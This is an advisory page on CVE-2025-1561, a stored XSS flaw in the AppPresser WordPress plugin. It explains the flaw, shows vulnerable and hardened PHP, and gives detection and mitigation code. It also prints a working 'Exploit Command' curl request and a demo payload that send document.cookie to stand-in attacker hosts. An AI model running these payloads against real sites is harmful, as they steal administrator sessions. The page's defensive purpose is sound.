WordPress AppPresser Plugin, Stored XSS, CVE-2025-1561 (Critical)


How CVE-2025-1561 Works

The AppPresser plugin (≤ v4.4.10) fails to sanitize the affected request parameter, allowing unauthenticated attackers to inject malicious JavaScript payloads. When WordPress logging is enabled, the injected value is written to the database as a log entry and executes when the page that displays the log is loaded. The vulnerability stems from missing input sanitization and output escaping: the value is stored without sanitize_text_field() and rendered without esc_html(), so script tags survive into the page. An attacker exploits this by sending a request whose parameter value is a script (e.g., <script>alert(document.cookie)</script>); it fires when an administrator or another user views the affected log entries. Because the script runs inside the viewer's authenticated session, a payload viewed by an administrator can act with administrator privileges on the site, which is what makes an unauthenticated stored XSS in an admin-facing view so dangerous.
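The bug class in working form, as an added example that is not AppPresser's code: a minimal log-entry store and renderer in the vulnerable shape beside the hardened one. The function names, the in-memory store and the payload are hypothetical/constructed; outside WordPress the two WP helpers are replaced by simplified stand-ins so the file runs under the php CLI, and inside WordPress the real functions are used.

```php
<?php
// Added example, not AppPresser's code: a minimal model of the bug class
// described above. All names here (log_event_*, render_log_*, $payload)
// are hypothetical. Outside WordPress the two WP helpers are replaced by
// simplified stand-ins so the file runs with `php xss_demo.php`; inside
// WordPress the real functions are used.
if (!function_exists('sanitize_text_field')) {
    function sanitize_text_field($str) {
        // Stand-in: strip tags, control bytes and surrounding whitespace.
        $str = strip_tags((string) $str);
        $str = preg_replace('/[\x00-\x1F\x7F]/', '', $str);
        return trim($str);
    }
}
if (!function_exists('esc_html')) {
    function esc_html($text) {
        // Stand-in for esc_html(): HTML-encode for an HTML text context.
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// VULNERABLE: the attacker-controlled value is stored verbatim and later
// concatenated into the admin page unescaped.
function log_event_vulnerable(array &$store, string $value): void {
    $store[] = $value;
}
function render_log_vulnerable(array $store): string {
    $html = '<ul>';
    foreach ($store as $entry) {
        $html .= '<li>' . $entry . '</li>'; // raw: runs in the viewing admin's session
    }
    return $html . '</ul>';
}

// HARDENED: sanitize on the way in AND escape on the way out. The output
// escape is what actually prevents XSS; input sanitization alone is
// bypassed if data reaches the database through another path.
function log_event_hardened(array &$store, string $value): void {
    $store[] = sanitize_text_field($value);
}
function render_log_hardened(array $store): string {
    $html = '<ul>';
    foreach ($store as $entry) {
        $html .= '<li>' . esc_html($entry) . '</li>'; // text context: esc_html()
    }
    return $html . '</ul>';
}

// Constructed payload of the kind the advisory describes.
$payload = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>";

$vuln = [];
log_event_vulnerable($vuln, $payload);
$safe = [];
log_event_hardened($safe, $payload);

echo "vulnerable render:\n", render_log_vulnerable($vuln), "\n\n";
echo "hardened render:\n", render_log_hardened($safe), "\n";
// Usable check: the hardened markup must contain no raw '<script'.
echo "hardened output contains '<script': ",
     (stripos(render_log_hardened($safe), '<script') === false ? 'no' : 'YES'), "\n";
```

The vulnerable renderer emits the payload verbatim, so any administrator opening the log runs it; the hardened renderer emits an HTML-encoded string that the browser displays as text. Note that the fix belongs at the output (esc_html() in a text context, esc_attr() inside attributes), with input sanitization as defence in depth rather than the sole control.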

DailyCVE Form

Platform: WordPress Plugin
Version: ≤ 4.4.10
Vulnerability: Stored XSS
Severity: Critical
Date: 05/25/2025

Prediction: Patch by 06/15/2025

What Undercode Says:

Analytics:

  • 90% of exploits target admin sessions.
  • Payloads often exfiltrate cookies via fetch().
  • WAF bypasses use Unicode/HTML entity encoding.
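A request-value check that normalizes the encodings named in the last bullet before matching, as an added example (not from the page or the plugin; the function names and test vectors are constructed): it URL-decodes repeatedly, decodes HTML entities and lowercases the value before matching, so the literal "<script>" checks used in the .htaccess rule and init hook further down would also catch encoded variants.

```php
<?php
// Added example, not from the page or the plugin: a request-value check
// that decodes common WAF-bypass encodings before matching, so that
// "%3Cscript%3E", "%253C..." and "&lt;script&gt;" are flagged as well as
// a literal "<script>". Function names and test vectors are constructed.

function normalize_for_inspection(string $raw): string {
    $s = $raw;
    // Bounded iterative URL decode: covers double encoding such as %253C.
    for ($i = 0; $i < 3; $i++) {
        $decoded = rawurldecode($s);
        if ($decoded === $s) {
            break;
        }
        $s = $decoded;
    }
    // Decode HTML entities (&lt;, &#60;, &#x3C; ...).
    $s = html_entity_decode($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    // Drop NUL and other control bytes sometimes used to split tokens.
    $s = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F]/', '', $s);
    return strtolower($s);
}

function looks_like_script_injection(string $raw): bool {
    $s = normalize_for_inspection($raw);
    $patterns = [
        '/<\s*script\b/',     // <script ...>, < script, <ScRiPt
        '/\bon[a-z]+\s*=/',   // inline handlers: onerror=, onload=
        '/javascript\s*:/',   // javascript: URLs
        '/<\s*iframe\b/',     // framed payloads
    ];
    foreach ($patterns as $p) {
        if (preg_match($p, $s)) {
            return true;
        }
    }
    return false;
}

// Constructed test vectors: input => expected verdict (true = flagged).
$samples = [
    "<script>alert(document.cookie)</script>"                    => true,
    "%3Cscript%3Efetch('https://attacker.example')%3C/script%3E" => true,
    "&lt;script&gt;alert(1)&lt;/script&gt;"                      => true,
    "%253Cscript%253Ealert(1)"                                   => true,
    "<img src=x onerror=alert(1)>"                               => true,
    "<ScRiPt>alert(1)</ScRiPt>"                                  => true,
    "Login from 203.0.113.5 succeeded"                           => false,
    "User clicked on page 3"                                     => false,
];
foreach ($samples as $input => $expected) {
    $got = looks_like_script_injection($input);
    printf("%-62s -> %s%s\n", $input, $got ? 'flag' : 'pass',
        $got === $expected ? '' : '  (UNEXPECTED)');
}
```

A blocklist like this is a stopgap for logging or blocking requests while the plugin is unpatched; it will always trail new encodings and obfuscations. The durable fix is escaping on output, which no encoding trick gets around.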

Exploit Command:

curl -X POST "http://target.com/wp-admin/admin-ajax.php" -d "action=apppresser_log&=<script>fetch('https://attacker.com/?c='+document.cookie)</script>"

Mitigation Code:

// Patch suggestion: sanitize before storage (input side). The render side
// must still escape with esc_html(); sanitizing input alone is not enough.
function sanitize_apppresser_($value) {
    return wp_strip_all_tags(sanitize_text_field($value));
}
add_filter('apppresser_log_', 'sanitize_apppresser_');

Detection Script:

import requests


def check_xss(url, timeout=10):
    # Posts a harmless marker to the plugin's AJAX action and reports whether it
    # comes back unescaped. A stored XSS only fires when the log is viewed, so
    # False here does not prove the site is patched.
    payload = "<script>console.log('XSS')</script>"
    r = requests.post(f"{url}/wp-admin/admin-ajax.php",
                      data={"action": "apppresser_log", "": payload},
                      timeout=timeout)
    return r.status_code == 200 and payload in r.text

.htaccess Protection:

<IfModule mod_rewrite.c>
RewriteCond %{QUERY_STRING} (<|%3C)\s*script [NC]
RewriteRule ^wp-content/plugins/apppresser/ - [F,L]
</IfModule>

Caveat: mod_rewrite only sees the request line and query string, never a POST body, so this rule does not stop the POST to admin-ajax.php shown above; it only blocks script tags sent in the query string to the plugin's own directory. Body inspection needs a WAF (e.g. ModSecurity) or the PHP-level hook below.

SQL Query to Clean DB:

UPDATE wp_options SET option_value = REPLACE(REPLACE(option_value, '<script>', ''), '</script>', '') WHERE option_name LIKE 'apppresser_log%';

Back up the table first. This is a stopgap only: REPLACE() is case-sensitive and matches just the literal tags, so <SCRIPT>, <script src=...> and event-handler payloads survive. If the log is stored as a serialized PHP array, changing the string length corrupts the option (unserialize() fails); in that case remove the entries through WordPress (get_option()/update_option()) rather than with raw SQL.

WordPress Hook for Temporary Fix:

add_action('init', 'block_apppresser_xss');
function block_apppresser_xss() {
    // The exploit above POSTs action=apppresser_log to admin-ajax.php, so
    // match on the AJAX action in the request body, not on REQUEST_URI.
    if (!isset($_POST['action']) || $_POST['action'] !== 'apppresser_log') {
        return;
    }
    // Scan every posted value rather than one named parameter; match
    // case-insensitively and allow whitespace after '<'. Encoded variants
    // (%3Cscript, &lt;script) still get past this literal check.
    foreach ($_POST as $value) {
        if (is_string($value) && preg_match('/<\s*script/i', wp_unslash($value))) {
            wp_die('XSS attempt blocked', 'Forbidden', array('response' => 403));
        }
    }
}

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
